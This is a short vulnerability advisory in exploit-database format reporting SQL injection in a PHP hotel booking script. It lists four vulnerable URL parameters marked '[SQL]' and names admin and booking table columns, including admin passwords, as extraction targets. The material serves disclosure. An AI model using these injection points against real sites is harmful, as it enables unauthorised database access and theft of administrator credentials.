Hotel Booking Script version 1.0 suffers from a remote SQL injection vulnerability.
608d2b56b8c10d92462a8393c12d05e6
# # # # #
# Exploit Title: Hotel & Tour Package Script v1.0 - SQL Injection
# Google Dork: N/A
# Date: 26.03.2017
# Vendor Homepage: http://eagletechnosys.com/
# Software: http://www.eaglescripts.com/hotel-booking-script
# Demo: http://hotelbooking.phpscriptsdemo.com/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?show=view_offer&offer_id=[SQL]
# http://localhost/[PATH]/view_news.php?news_id=[SQL]
# http://localhost/[PATH]/page.php?id=[SQL]
# http://localhost/[PATH]/?show=view_room&room_id=[SQL]
# admin:id
# admin:username
# admin:password
# booking:id
# booking:cat_name
# Etc...
# # # # #